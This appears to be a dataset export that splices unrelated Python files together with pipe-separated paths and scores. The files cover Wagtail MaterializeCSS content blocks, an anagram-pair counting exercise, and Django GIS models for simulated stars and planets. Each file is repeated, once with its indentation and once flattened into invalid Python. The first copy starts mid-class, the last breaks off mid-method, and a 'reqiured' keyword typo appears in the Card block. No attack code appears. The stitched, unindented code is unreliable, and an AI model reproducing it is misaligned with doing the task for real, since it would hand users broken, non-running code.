    # preset card heights offered in the editor dropdown
    CARD_SIZES = [
        ('', 'Not Set'),
        ('small', 'Small'),
        ('medium', 'Medium'),
        ('large', 'Large'),
    ]
    size = blocks.ChoiceBlock(choices=CARD_SIZES, default=CARD_SIZES[0][0], required=False)
    horizontal = blocks.BooleanBlock(default=False, required=False, blank=True)
    image = ImageChooserBlock(required=False)
    background_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
    text_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)

    class Meta:
        label = _('Card')
        template = 'wagtail_materializecss/components/card.html'
class CollectionItem(blocks.StructBlock):
    """CollectionItem ('li' tag) is a list item that belongs in a stylized collection."""
    title = blocks.CharBlock()
    # optional icon shown on the item's secondary (right) side — template-dependent
    secondary_icon = blocks.CharBlock(default='', required=False, blank=True)

    class Meta:
        label = _('Collection Item')
        icon = 'list-ul'
        template = 'wagtail_materializecss/components/collection_item.html'
class CollectionLink(CollectionItem):
    """CollectionLink ('li' tag) is a link inside of list item that belongs in a stylized collection."""
    # destination: internal page with external URL fallback (see LinkStructValue.url)
    page = blocks.PageChooserBlock(label="page", required=False,
                                   help_text="Link to an existing page.")
    external_url = blocks.URLBlock(label="external URL", required=False,
                                   help_text="Alternative external link if a page is not set.")

    class Meta:
        label = _('Collection Link')
        icon = 'link'
        value_class = LinkStructValue
        template = 'wagtail_materializecss/components/collection_link.html'
class CollectionHeader(CollectionItem):
    """CollectionHeader ('li' tag) is a large header for a stylized collection."""
    # no extra fields — inherits title/secondary_icon from CollectionItem

    class Meta:
        label = _('Collection Header')
        icon = 'title'
        template = 'wagtail_materializecss/components/collection_header.html'
class CollectionAvatar(blocks.StructBlock):
    """CollectionAvatar ('li' tag) is a bigger collection item that includes an image or icon."""
    # either an image or an icon supplies the avatar visual
    image = ImageChooserBlock(required=False, blank=True, help_text="Main image (icon is an alternative option)")
    icon = blocks.CharBlock(required=False, blank=True, help_text="Main image as an icon instead of an image.")
    title = blocks.CharBlock()
    content = blocks.RichTextBlock(default='', required=False, blank=True)
    secondary_icon = blocks.CharBlock(default='', required=False, blank=True)

    class Meta:
        label = _('Collection Avatar')
        icon = 'user'
        template = 'wagtail_materializecss/components/collection_avatar.html'
class Collection(blocks.StreamBlock):
    """Collection ('ul' tag) is a stylized list containing different collection items."""
    header = CollectionHeader(required=False, blank=True)
    link = CollectionLink(required=False, blank=True)
    item = CollectionItem(required=False, blank=True)
    avatar = CollectionAvatar(required=False, blank=True)

    class Meta:
        label = _('Collection')
        icon = 'list-ul'
        # value_class = HasHeaderValue
        template = 'wagtail_materializecss/components/collection.html'

    def get_context(self, value, parent_context=None):
        """Expose `value.has_header` so the template can pick the with-header markup."""
        context = super().get_context(value, parent_context=parent_context)
        # True when any child block in the stream is a 'header' block
        value.has_header = any((block.block_type == 'header' for block in context['value']))
        return context
class Icon(blocks.CharBlock):
    """Simple icon tag for Material Icons."""
    # the CharBlock value is the Material-Icons icon name; rendering is template-side

    class Meta:
        label = _('Icon')
        template = 'wagtail_materializecss/components/icon.html'
class PageColorStructValue(blocks.StructValue):
    """StructValue that resolves a display color, falling back to the linked page's color."""

    def color_value(self):
        """Return the explicit color if set, else the chosen page's `color` attribute (if any)."""
        explicit_color = self.get('color')
        if explicit_color:
            return explicit_color
        page = self.get('page')
        if page:
            try:
                return page.color
            except AttributeError:
                # page model without a color attribute -> no color resolved
                pass
class Preloader(blocks.StructBlock):
    """Preloader ('div' tag) progress bar."""
    # determinate (known progress) vs indeterminate animation — template-dependent
    determinate = blocks.BooleanBlock(default=False, required=False, blank=True)
    # circular spinner vs linear bar — template-dependent
    circular = blocks.BooleanBlock(default=True, required=False, blank=True)
    color = blocks.CharBlock(required=False, blank=True, help_text='Preloader color (leave blank to use page color.)')

    class Meta:
        label = _('Preloader')
        icon = 'spinner'
        value_class = PageColorStructValue
template = 'wagtail_materializecss/components/preloader.html' | wagtail_materializecss/components.py | from django.utils.translation import ugettext_lazy as _
from wagtail.core import blocks
from wagtail.images.blocks import ImageChooserBlock
__all__ = ['LinkBlock', 'Badge', 'Button', 'FAB', 'Breadcrumb', 'Card', 'Collection', 'Icon', 'Preloader']
class LinkStructValue(blocks.StructValue):
def url(self):
external_url = self.get('external_url')
page = self.get('page')
if external_url:
return external_url
elif page:
return page.url
class LinkBlock(blocks.StructBlock):
"""Link block ('a' tag) with the options to link to a page or external url. This block also has an icon option."""
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
text = blocks.CharBlock(label="link text", required=True)
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'site'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/link_block.html'
label = _('Link')
class Badge(blocks.StructBlock):
"""Badge ('span' tag) that notifies user that an item is unread."""
number = blocks.IntegerBlock()
is_new = blocks.BooleanBlock()
class Meta:
label = _('Badge')
template = 'wagtail_materializecss/components/badge.html'
class Button(LinkBlock):
"""Button ('a' tag) is a link block that can have a set color."""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
icon = 'link'
value_class = LinkStructValue
label = _('Button')
template = 'wagtail_materializecss/components/button.html'
class FAB(blocks.StructBlock):
"""Floating action button. This block only has an icon, color, and link. This block has no text!"""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'plus-inverse'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/fab.html'
label = _('Floating Action Button')
class Breadcrumb(blocks.ListBlock):
"""Breadcrumb that show the page hierarchy. This breadcrumb should be a list of links that point back to the
root page.
"""
def __init__(self, child_block=None, **kwargs):
if child_block is None:
child_block = LinkBlock()
super().__init__(child_block, **kwargs)
class Meta:
label = _('Breadcrumb')
template = 'wagtail_materializecss/components/breadcrumb.html'
class Card(blocks.StructBlock):
"""Card to display content in many different ways."""
title = blocks.CharBlock(default='', blank=True)
content = blocks.RichTextBlock(default='', blank=True)
actions = blocks.ListBlock(LinkBlock(label=_('Card Action')), default=[], blank=True, reqiured=False)
CARD_SIZES = [
('', 'Not Set'),
('small', 'Small'),
('medium', 'Medium'),
('large', 'Large'),
]
size = blocks.ChoiceBlock(choices=CARD_SIZES, default=CARD_SIZES[0][0], required=False)
horizontal = blocks.BooleanBlock(default=False, required=False, blank=True)
image = ImageChooserBlock(required=False)
background_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
text_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
label = _('Card')
template = 'wagtail_materializecss/components/card.html'
class CollectionItem(blocks.StructBlock):
"""CollectionItem ('li' tag) is a list item that belongs in a stylized collection."""
title = blocks.CharBlock()
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Item')
icon = 'list-ul'
template = 'wagtail_materializecss/components/collection_item.html'
class CollectionLink(CollectionItem):
"""CollectionLink ('li' tag) is a link inside of list item that belongs in a stylized collection."""
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
label = _('Collection Link')
icon = 'link'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/collection_link.html'
class CollectionHeader(CollectionItem):
"""CollectionHeader ('li' tag) is a large header for a stylized collection."""
class Meta:
label = _('Collection Header')
icon = 'title'
template = 'wagtail_materializecss/components/collection_header.html'
class CollectionAvatar(blocks.StructBlock):
"""CollectionAvatar ('li' tag) is a bigger collection item that includes an image or icon."""
image = ImageChooserBlock(required=False, blank=True, help_text="Main image (icon is an alternative option)")
icon = blocks.CharBlock(required=False, blank=True, help_text="Main image as an icon instead of an image.")
title = blocks.CharBlock()
content = blocks.RichTextBlock(default='', required=False, blank=True)
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Avatar')
icon = 'user'
template = 'wagtail_materializecss/components/collection_avatar.html'
class Collection(blocks.StreamBlock):
"""Collection ('ul' tag) is a stylized list containing different collection items."""
header = CollectionHeader(required=False, blank=True)
link = CollectionLink(required=False, blank=True)
item = CollectionItem(required=False, blank=True)
avatar = CollectionAvatar(required=False, blank=True)
class Meta:
label = _('Collection')
icon = 'list-ul'
# value_class = HasHeaderValue
template = 'wagtail_materializecss/components/collection.html'
def get_context(self, value, parent_context=None):
context = super().get_context(value, parent_context=parent_context)
value.has_header = any((block.block_type == 'header' for block in context['value']))
return context
class Icon(blocks.CharBlock):
"""Simple icon tag for Material Icons."""
class Meta:
label = _('Icon')
template = 'wagtail_materializecss/components/icon.html'
class PageColorStructValue(blocks.StructValue):
def color_value(self):
color = self.get('color')
page = self.get('page')
if color:
return color
elif page:
try:
return page.color
except AttributeError:
pass
class Preloader(blocks.StructBlock):
"""Preloader ('div' tag) progress bar."""
determinate = blocks.BooleanBlock(default=False, required=False, blank=True)
circular = blocks.BooleanBlock(default=True, required=False, blank=True)
color = blocks.CharBlock(required=False, blank=True, help_text='Preloader color (leave blank to use page color.)')
class Meta:
label = _('Preloader')
icon = 'spinner'
value_class = PageColorStructValue
template = 'wagtail_materializecss/components/preloader.html' | 0.764452 | 0.094343 |
import math
import os
import random
import re
import sys
def anagrams_in_string(s):
'''
Given a string, find the number of pairs of substrings of the string that are anagrams of each other.
For example 'mom', the list of all anagrammatic pairs is [m,m], [mo, om].
Anagrams = the letters of one string can be rearranged to form the other string.
'abba' => [a,a], [b,b], [ab, ba], [abb, bba]
'''
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
total = 0
sorted_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
print(total)
return total
# Maybe, after getting a substring, sort it and put it in lookup dict
# Make an entry if it doesn't exist
# If not, increment
# For each entry that has value 2, increment total of pairs.
# For brute force, compare each substring with the other substrings to see if they are anagrams.
# To see if anagrams, sorted lists of letters would be equal. For one way.
# anagrams_in_string('abba') # 4
# anagrams_in_string('ifailuhkqq') # 3
# 10 <-- ['k', 'kk', 'kkk', 'kkkk', 'k', 'kk', 'kkk', 'k', 'kk', 'k']
# anagrams_in_string('kkkk')
# # 6 [k,k] + 3 [kk,kk] + 1 [kkk,kkk]
anagrams_in_string('cdcd') # 5 <-- [c,c], [d,d], [cd,dc], [cd, cd], [dc, cd]
'''
# Version with answer dictionary:
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
# print(subs)
total = 0
sorted_dict = {}
answer_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
answer_dict[sub] = []
# print(sorted_dict)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if subs[j] in answer_dict[subs[i]]:
total += 1
elif sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
answer_dict[subs[i]].append(subs[j])
print(total)
return total
'''
'''
# Version with dictionary of key/value sorted_substring : instances of it
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
subs_dict = {}
for sub in subs:
sub_list = sorted(sub)
print(sub_list)
sub_str = ''.join([str(elem) for elem in sub_list])
print(sub_str)
if sub_str in subs_dict:
subs_dict[sub_str] += 1
else:
subs_dict[sub_str] = 1
print(subs_dict)
total = 0
for item in subs_dict.items():
if item[1] > 1:
total += 1
print(total)
return total
''' | strings/anagrams_in_string.py | import math
import os
import random
import re
import sys
def anagrams_in_string(s):
'''
Given a string, find the number of pairs of substrings of the string that are anagrams of each other.
For example 'mom', the list of all anagrammatic pairs is [m,m], [mo, om].
Anagrams = the letters of one string can be rearranged to form the other string.
'abba' => [a,a], [b,b], [ab, ba], [abb, bba]
'''
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
total = 0
sorted_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
print(total)
return total
# Maybe, after getting a substring, sort it and put it in lookup dict
# Make an entry if it doesn't exist
# If not, increment
# For each entry that has value 2, increment total of pairs.
# For brute force, compare each substring with the other substrings to see if they are anagrams.
# To see if anagrams, sorted lists of letters would be equal. For one way.
# anagrams_in_string('abba') # 4
# anagrams_in_string('ifailuhkqq') # 3
# 10 <-- ['k', 'kk', 'kkk', 'kkkk', 'k', 'kk', 'kkk', 'k', 'kk', 'k']
# anagrams_in_string('kkkk')
# # 6 [k,k] + 3 [kk,kk] + 1 [kkk,kkk]
anagrams_in_string('cdcd') # 5 <-- [c,c], [d,d], [cd,dc], [cd, cd], [dc, cd]
'''
# Version with answer dictionary:
# Get all substrings.
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
# print(subs)
total = 0
sorted_dict = {}
answer_dict = {}
for sub in subs:
sorted_dict[sub] = sorted(sub)
answer_dict[sub] = []
# print(sorted_dict)
for i in range(len(subs)):
for j in range(i + 1, len(subs)):
if subs[j] in answer_dict[subs[i]]:
total += 1
elif sorted_dict[subs[i]] == sorted_dict[subs[j]]:
total += 1
answer_dict[subs[i]].append(subs[j])
print(total)
return total
'''
'''
# Version with dictionary of key/value sorted_substring : instances of it
subs = [s[i:j] for i in range(len(s)) for j in range(i + 1, len(s) + 1)]
subs_dict = {}
for sub in subs:
sub_list = sorted(sub)
print(sub_list)
sub_str = ''.join([str(elem) for elem in sub_list])
print(sub_str)
if sub_str in subs_dict:
subs_dict[sub_str] += 1
else:
subs_dict[sub_str] = 1
print(subs_dict)
total = 0
for item in subs_dict.items():
if item[1] > 1:
total += 1
print(total)
return total
''' | 0.097589 | 0.415492 |
from django.contrib.gis.geos import *
from django.contrib.gis.measure import D
from procyon.starsystemmaker.space_helpers import *
from django.contrib.gis.db import models
from procyon.starcatalog.models import Star, StarType, StarLuminosityType
import json
class StarModel(models.Model):
"""
Additional data and simulated info about stars.
Data needs to be generated using 'build_model' before being accessed
"""
star = models.OneToOneField(Star, db_index=True, help_text="The star with real data", default=1)
star_type = models.ForeignKey(StarType, help_text="Stellar Classification", blank=True, null=True)
luminosity_class = models.ForeignKey(StarLuminosityType, help_text="Luminosity Class (0-VII)", blank=True, null=True)
luminosity_mod = models.CharField(max_length=5, help_text="Luminosity sub class (a, ab, b, a-0", blank=True, null=True)
base_color = models.CharField(max_length=8, help_text="Basic RBG Color", default="#ffddbe", blank=True, null=True)
rand_seed = models.FloatField(help_text="Random Seed from 0-1 used to build notional system", blank=True, null=True, default=0)
guessed_temp = models.FloatField(help_text="Guessed at Temperature", blank=True, null=True, default=0)
guessed_mass = models.FloatField(help_text="Guessed at Mass", blank=True, null=True, default=0)
guessed_radius = models.FloatField(help_text="Guessed at Radius", blank=True, null=True, default=0)
guessed_age = models.FloatField(help_text="Guessed at Age", blank=True, null=True, default=0)
json_of_closest_stars = models.TextField(help_text="List of Stars, will be filled in automatically on first calculation", blank=True, null=True)
ids_of_companion_stars = models.CharField(max_length=30, help_text="Comma-separated IDs of any stars within .3 LY", blank=True, null=True)
location = models.PointField(db_index=True, dim=3, blank=True, null=True, srid=900913)
objects = models.GeoManager()
def build_model(self, star_id=None, star_prime=None, forced=False):
np.random.seed()
self.add_rand_seed(forced)
if not star_prime and not star_id:
star_prime = self.star
if star_prime:
self.star = star_prime
else:
self.star = Star.objects.get(id=star_id)
if self.star:
star_a, star_b, star_c, star_d = get_star_type(self.star.spectrum)
self.add_type(star_a)
self.add_color(star_a, star_b, star_c)
self.add_luminosity(star_c)
self.luminosity_mod = star_d
self.add_rand_variables(forced)
self.save()
def add_rand_seed(self, forced=False):
add_it = True
if not forced and self.rand_seed:
add_it = False
if add_it:
self.rand_seed = np.random.random() #rand_range(0, 1)
self.save()
def add_rand_variables(self, forced=False):
add_it = True
if not forced and self.guessed_temp:
add_it = False
if add_it:
options = {'rand_seed': self.rand_seed, 'star_type': self.star_type,
'temp': 0, 'mass': 0, 'age': 0, 'radius': 0,
'luminosity_class': self.luminosity_class, 'luminosity_mod': self.luminosity_mod}
settings = star_variables(options)
self.guessed_temp = settings.get('temp', 0)
self.guessed_mass = settings.get('mass', 0)
self.guessed_radius = settings.get('radius', 0)
self.guessed_age = settings.get('age', 0)
self.save()
def add_luminosity(self, star_c):
result = "ok"
try:
star_type = StarLuminosityType.objects.get(symbol=star_c)
self.luminosity_class = star_type
except StarLuminosityType.DoesNotExist:
result = "unknown"
return result
def add_type(self, star_a):
result = "ok"
try:
star_type = StarType.objects.get(symbol=star_a)
self.star_type = star_type
except StarType.DoesNotExist:
result = "unknown"
return result
def add_color(self, star_a="K", star_b="", star_c=""):
star = self
found_color = ""
if star_a or star_b or star_c:
found_color = color_of_star(star_a, star_b, star_c)
if not found_color and star.star and star.star.spectrum:
star_a, star_b, star_c = get_star_type(star.star.spectrum)
found_color = color_of_star(star_a, star_b, star_c)
if not found_color:
if star.star_type and star.star_type.base_color:
found_color = star.star_type.base_color
star.base_color = found_color
star.save()
class Meta:
verbose_name_plural = 'Stars (Simulated)'
ordering = ['star']
def nearby_stars(self, force_regenerate=False):
if self.json_of_closest_stars and not force_regenerate:
star_list = json.loads(self.json_of_closest_stars)
else:
star_list = closest_stars(self, StarModel)
self.json_of_closest_stars = json.dumps(star_list)
self.save()
return star_list
def nearby_stars_json(self):
self.nearby_stars()
return self.json_of_closest_stars
def nearby_stars_json_force_recalc(self):
self.nearby_stars(force_regenerate=True)
return self.json_of_closest_stars
additional_methods = ['nearby_stars', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
val = self.__getattribute__(field)
if type(val) == Point:
point = dict()
point['x'] = val.x
point['y'] = val.y
point['z'] = val.z
dumps[str(field)] = point
else:
dumps[str(field)] = str(val)
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps
class PlanetType(models.Model):
"""
Planet Types (from http://en.wikipedia.org/wiki/List_of_planet_types)
"""
name = models.CharField(max_length=30, help_text="Short description", blank=True, null=True)
mass_range = models.CharField(max_length=30, help_text="Mass Range in sextillion tonnes (10^24. Earth=5.9)", blank=True, null=True)
radius_range = models.CharField(max_length=30, help_text="Radius Range in km (Earth=6371)", blank=True, null=True)
age_range = models.CharField(max_length=30, help_text="Age Range in million years (Earth=4540)", blank=True, null=True)
surface_area_range = models.CharField(max_length=30, help_text="Surface Area Range in million km^2 (Earth=510.1)", blank=True, null=True)
moon_range = models.CharField(max_length=30, help_text="Average number of moons (Earth=1)", blank=True, null=True)
density_range = models.CharField(max_length=30, help_text="Density Range in % (Earth=1)", blank=True, null=True)
length_days_range = models.CharField(max_length=30, help_text="Day Length Range in hours (Earth=24)", blank=True, null=True)
temperature_range = models.CharField(max_length=30, help_text="Temperature Range in C (Earth=15)", blank=True, null=True)
magnetic_field_range = models.CharField(max_length=30, help_text="Amount of magnetic field, 0 for none. (Earth=1, Jupiter=19519)", blank=True, null=True, default=0)
craterization_range = models.CharField(max_length=30, help_text="Amount of surface bombardment, 0 for none. (Earth=1)", blank=True, null=True, default=0)
mineral_surface = models.BooleanField(help_text="Is surface made of rock?", blank=True)
solid_core = models.BooleanField(help_text="Is core solid?", blank=True)
plate_tectonics = models.BooleanField(help_text="Is surface made of moving plates?", blank=True)
def __unicode__(self):
return '{0}'.format(self.name)
class Meta:
verbose_name_plural = 'Types of Planets'
class PlanetFeature(models.Model):
"""
Major features of a planetary body
"""
short_name = models.CharField(db_index=True, max_length=60, help_text="Short Description of Planetary Feature", blank=True, null=True)
details = models.TextField(help_text="Detailed Description of Planetary Feature", blank=True, null=True)
rules_required = models.TextField(help_text="What attributes of the planet must be true to have this feature?", blank=True, null=True)
rules_more_likely = models.TextField(help_text="What attributes of the planet double the chances to have this feature?", blank=True, null=True)
likelihood = models.FloatField(help_text="How likely is a planet to have this feature (0 to 1) given that the above are met?", blank=True, null=True, default="0.1")
class PlanetModel(models.Model):
"""
Simulated Planets
"""
name = models.CharField(db_index=True, max_length=60, help_text="Planet Common Name", blank=True, null=True)
planet_type = models.ForeignKey(PlanetType, help_text="Type of planet", default=1, blank=True, null=True)
mass = models.FloatField(db_index=True, help_text="Estimated Mass (Earth=1, Mercury=.05, Mars=.1, Jupiter=317)", blank=True, null=True)
radius = models.FloatField(help_text="Estimated Radius (Earth=1, Mercury=.382, Jupiter=10.97, Saturn=9.14) ", blank=True, null=True)
density = models.FloatField(help_text="Density in g/cm^3 (Earth=5.51, Jupiter=1.33, Saturn=0.68, Pluto=1.75)", blank=True, null=True)
gravity = models.FloatField(help_text="Surface Gravity (g=m/r^2, Earth=1, Mercury=0.38, Jupiter=2.53, Pluto=0.067)", blank=True, null=True)
oblateness = models.FloatField(help_text="How squished it is (Earth=.0034, Venus=0, Saturn=.0979)", blank=True, null=True)
tilt = models.FloatField(help_text="Axial Tilt (Earth=23.4, Uranus=97, Venus=177)", blank=True, null=True)
albedo = models.FloatField(help_text="How much light does the surface reflect (0 to 1)", blank=True, null=True)
length_days = models.FloatField(help_text="How many hours are the days (Earth=24)", blank=True, null=True)
surface_temp_low = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
surface_temp_high = models.CharField(max_length=30, help_text="Low Temperature in C", blank=True, null=True, default=0)
magnetic_field = models.FloatField(help_text="How strong a magnetic field (Earth=1, Jupiter=19519)", blank=True, null=True)
craterization = models.FloatField(help_text="How many craters? (Earth=1, Moon=2, Mars=3, Jupiter=0)", blank=True, null=True)
#TODO: Figure out how to have a list of minerals and amounts that makes sense for coloring, mining, changing
#TODO: Same for atmosphere gasses
mineral_surface_early = models.FloatField(help_text="% Amount of H, He, C (0 to 1)", blank=True, null=True)
mineral_surface_mid = models.FloatField(help_text="% Amount of N, O, Fe (0 to 1)", blank=True, null=True)
mineral_surface_heavy = models.FloatField(help_text="% Amount of Heavier Metals (0 to 1)", blank=True, null=True)
mineral_surface_late = models.FloatField(help_text="% Amount of Exotic Metals (0 to 1)", blank=True, null=True)
minerals_specific = models.CharField(max_length=100, help_text="Comma-separated list of specific notable minerals", blank=True, null=True, default="")
solid_core_size = models.FloatField(help_text="Percentage size of planet that is core (0 to 1, Earth=.31)", blank=True, null=True)
solid_core_type = models.CharField(max_length=30, help_text="Type of Core", blank=True, null=True, default="Iron")
plate_tectonics_amount = models.FloatField(help_text="Amount of tectonics and plate movement (Earth=1, Io=20)", blank=True, null=True)
surface_solidity = models.FloatField(help_text="How solid is surface (Inner=1, Gas Giants=0)", blank=True, null=True)
surface_ocean_amount = models.FloatField(help_text="% surface is covered with liquid (0 to 1, Earth=.71)", blank=True, null=True)
surface_ocean_chemicals = models.CharField(max_length=100, help_text="Main composition of surface oceans (Earth=Salt Water, Titan=Ethane and Methane", blank=True, null=True, default="")
subsurface_ocean_amount = models.FloatField(help_text="% of subsurface that is liquid (0 to 1, Europa=1.0)", blank=True, null=True)
ice_amount_north_pole = models.FloatField(help_text="% North Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_south_pole = models.FloatField(help_text="% South Pole is covered with ice (0 to 1, Earth=.01)", blank=True, null=True)
ice_amount_total = models.FloatField(help_text="% overall surface is covered with ice, not counting poles (0 to 1, Europa=1.0)", blank=True, null=True)
semi_major_axis = models.FloatField(help_text="Semi-major Axis in au", blank=True, null=True)
revolution = models.FloatField(help_text="Revolutions per earth day", blank=True, null=True)
orbital_period = models.FloatField(help_text="Orbital Period in days", blank=True, null=True)
orbital_eccentricity = models.FloatField(help_text="Orbital Eccentricity", blank=True, null=True)
periastron = models.FloatField(help_text="Degrees of Periastron", blank=True, null=True)
periastron_time = models.FloatField(help_text="Time of Periastron in JD", blank=True, null=True)
velocity_semi_amplitude = models.FloatField(help_text="Semiamplitude of doppler variation", blank=True, null=True)
ring_size = models.FloatField(help_text="Size of rings (as percentage of radius)", blank=True, null=True)
ring_numbers = models.IntegerField(help_text="Number of ring groups", blank=True, null=True)
atmosphere_millibars = models.FloatField(help_text="Pressure of atmosphere in Millibars (Mars=7, Earth=1013.25)", blank=True, null=True)
atmosphere_main_gas = models.CharField(max_length=30, help_text="Major gas (70%), if any", blank=True, null=True)
atmosphere_secondary_gas = models.CharField(max_length=30, help_text="Second gas (20%), if any", blank=True, null=True)
atmosphere_tertiary_gas = models.CharField(max_length=30, help_text="Tertiary gas (9%), if any", blank=True, null=True)
atmosphere_dust_amount = models.FloatField(help_text="Grams of dust/m^2 (Earth=1, Moon=1000, Mars=500)", blank=True, null=True)
surface_wind_speeds_avg = models.FloatField(help_text="Average Wind Speeds in km/hr (Mars=108, Earth=17, Neptune=700)", blank=True, null=True)
surface_wind_speeds_max = models.FloatField(help_text="Max Wind Speeds in km/hr (Mars=288, Earth=400, Neptune=2100)", blank=True, null=True)
other_name = models.CharField(db_index=True, max_length=60, help_text="Alternate Planet Common Name", blank=True, null=True)
parent_star = models.ForeignKey(Star, db_index=True, help_text="The star that it orbits", blank=True, null=True)
parent_planet = models.ForeignKey('self', db_index=True, help_text="A planet that it orbits", blank=True, null=True)
major_features = models.ManyToManyField(PlanetFeature, help_text="What features are significant on this planet", blank=True, null=True)
def __unicode__(self):
name = self.name
if self.other_name:
name = '{0} [{1}]'.format(self.name, self.other_name)
return name
class Meta:
verbose_name_plural = 'Planets (Simulated)'
ordering = ['name']
additional_methods = ['__unicode__', ]
def get_params(self, requested_methods=None, only_variables=None):
"""
Converts parameters to object.
Options:
requested_methods = ['__unicode__', ] (to also call these functions and return results)
only_variables = ['name', 'title', ] (to only return values of these model variables)
"""
additional_methods = self.additional_methods
if requested_methods:
additional_methods = requested_methods + additional_methods
dumps = dict()
if not only_variables:
model_fields = [field.name for field in self._meta.fields]
else:
model_fields = only_variables
for field in model_fields:
dumps[str(field)] = str(self.__getattribute__(field))
for func in additional_methods:
dumps[func] = getattr(self, func)()
return dumps | procyon/starsystemmaker/models.py | from django.contrib.gis.geos import *
from django.contrib.gis.measure import D
from procyon.starsystemmaker.space_helpers import *
from django.contrib.gis.db import models
from procyon.starcatalog.models import Star, StarType, StarLuminosityType
import json
class StarModel(models.Model):
"""
Additional data and simulated info about stars.
Data needs to be generated using 'build_model' before being accessed
"""
star = models.OneToOneField(Star, db_index=True, help_text="The star with real data", default=1)
star_type = models.ForeignKey(StarType, help_text="Stellar Classification", blank=True, null=True)
luminosity_class = models.ForeignKey(StarLuminosityType, help_text="Luminosity Class (0-VII)", blank=True, null=True)
luminosity_mod = models.CharField(max_length=5, help_text="Luminosity sub class (a, ab, b, a-0", blank=True, null=True)
base_color = models.CharField(max_length=8, help_text="Basic RBG Color", default="#ffddbe", blank=True, null=True)
rand_seed = models.FloatField(help_text="Random Seed from 0-1 used to build notional system", blank=True, null=True, default=0)
guessed_temp = models.FloatField(help_text="Guessed at Temperature", blank=True, null=True, default=0)
guessed_mass = models.FloatField(help_text="Guessed at Mass", blank=True, null=True, default=0)
guessed_radius = models.FloatField(help_text="Guessed at Radius", blank=True, null=True, default=0)
guessed_age = models.FloatField(help_text="Guessed at Age", blank=True, null=True, default=0)
json_of_closest_stars = models.TextField(help_text="List of Stars, will be filled in automatically on first calculation", blank=True, null=True)
ids_of_companion_stars = models.CharField(max_length=30, help_text="Comma-separated IDs of any stars within .3 LY", blank=True, null=True)
location = models.PointField(db_index=True, dim=3, blank=True, null=True, srid=900913)
objects = models.GeoManager()
def build_model(self, star_id=None, star_prime=None, forced=False):
np.random.seed()
self.add_rand_seed(forced)
if not star_prime and not star_id:
star_prime = self.star
if star_prime:
self.star = star_prime
else:
self.star = Star.objects.get(id=star_id)
if self.star:
star_a, star_b, star_c, star_d = get_star_type(self.star.spectrum)
self.add_type(star_a)
self.add_color(star_a, star_b, star_c)
self.add_luminosity(star_c)
self.luminosity_mod = star_d
self.add_rand_variables(forced)
self.save()
def add_rand_seed(self, forced=False):
add_it = True
if not forced and self.rand_seed:
add_it = False
if add_it:
self.rand_seed = np.random.random() #rand_range(0, 1)
self.save()
def add_rand_variables(self, forced=False):
add_it = True
if not forced and self.guessed_temp:
add_it = False
if add_it:
options = {'rand_seed': self.rand_seed, 'star_type': self.star_type,
'temp': 0, 'mass': 0, 'age': 0, 'radius': 0,
'luminosity_class': self.luminosity_class, 'luminosity_mod': self.luminosity_mod}
settings = star_variables(options)
self.guessed_temp = settings.get('temp', 0)
self.guessed_mass = settings.get('mass', 0)
self.guessed_radius = settings.get('radius', 0)
self.guessed_age = settings.get('age', 0)
self.save()
def add_luminosity(self, star_c):
result = "ok"
try:
star_type = StarLuminosityType.objects.get(symbol=star_c)
self.luminosity_class = star_type
except StarLuminosityType.DoesNotExist:
result = "unknown"
return result
def add_type(self, star_a):
result = "ok"
try:
star_type = StarType.objects.get(symbol=star_a)
self.star_type = star_type
except StarType.DoesNotExist:
result = "unknown"
return result
def add_color(self, star_a="K", star_b="", star_c=""):
star = self
found_color = ""
if star_a or star_b or star_c:
found_color = color_of_star(star_a, star_b, star_c)
if not found_color and star.star and star.star.spectrum:
star_a, star_b, star_c = get_star_type(star.star.spectrum)
found_color = color_of_star(star_a, star_b, star_c)
